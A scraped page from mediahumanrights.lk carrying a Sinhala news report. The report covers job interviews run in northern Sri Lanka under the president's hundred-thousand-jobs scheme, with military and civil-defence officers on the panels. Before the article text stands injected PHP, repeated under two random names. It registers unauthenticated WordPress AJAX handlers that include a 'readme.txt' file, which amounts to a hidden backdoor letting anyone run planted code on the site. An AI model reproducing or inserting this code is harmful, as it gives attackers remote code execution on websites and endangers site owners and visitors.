if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ජනපතිගේ රැකියා ලක්‍ෂයට තරුණ තරුණියන් පොරකති.. - mediahumanrights.lk
mediahumanrights.lk
Local News News

ජනපතිගේ රැකියා ලක්‍ෂයට තරුණ තරුණියන් පොරකති..

ජනාධිපතිතුමන්ගේ රුකියා ලක්ෂයේ සංකල්පයට අනුව උතුරේ දිළිඳු පවුල්හි තරුණ තරුණියන් විශාල පිරිසක් මේ දිනවල උතුරේ ආරම්භ කොට ඇති සම්මුඛ පරික්ෂණ සඳහා සහභාගී වෙමින් සිටිති.

26 වනදා ආරම්භ වූ  මෙම සම්මුඛ පරික්ෂණ 29 වනදා දක්වා ප්‍රාදේශීය ලේකම් කාර්යාලයන්හි පවත්වන අතර ඒ සඳහා සම්මුඛ පරික්ෂණ මණ්ඩල සාමාජිකයින් වශයෙන් ත්‍රිවිද හමුදාව හා සිවිල් ආරක්ෂක දෙපාර්තමේන්තු නිලධාරීන් සහභාගී වයි.

මේ අනුව වන්නි ආරක්ෂක සේනා ආඥාපති මේජර් ජෙනරාල් රෝහිත ධර්මසිරි මහතාගේ මගපෙන්වීම හා පූර්ණ අධීක්ෂණය යටතේ වන්නි බළප්‍රදේශයේ  පිහිටි ප්‍රාදේශිය ලේඛම් කොටිඨාශ 34 ආවරනය වන පරිදි සම්මුඛ පරීක්ෂණ මණ්ඩල 100 කට අධික ප්‍රමාණයක් ස්ථාපිත කරමින් දිස්ත්‍රික් ලේඛම් හා ප්‍රාදේශිය ලේඛම්වරුන්ගේ මූලිකත්වයෙන් එම කාර්යාල සමග සම්බන්ධතාවයෙන් සුදුස්සන් තොරා ගැනීමේ කටයුතු මේ දින වල ඉතා සාර්ථකව සිදුකරමින් පවති.
(under the courtesy of lankacnews.com news web)

Related posts

"මතක තියාගන්න ඔයාගෙ බිරිඳ කියන්නෙත් හැඟීම් විඳින්න කැමති ජීවියෙක්"- විවාහයට පෙර දිනයේ මවක් තම පුතුට කියූ සංවේදී කතාවක්

Shiran Viraj

පාස්කු ප්‍රහාරයට යුක්තිය ඉෂ්ඨ කර ගන්න ජාත්‍යන්තර අධිකරණය හමුවට වුවත් යනවා – කාදිනල් හිමිපාණන්

Shiran Viraj

රටේ ආර්ථිකය කඩා වැටීම වැලැක්විය නොහැකියි…

Shiran Viraj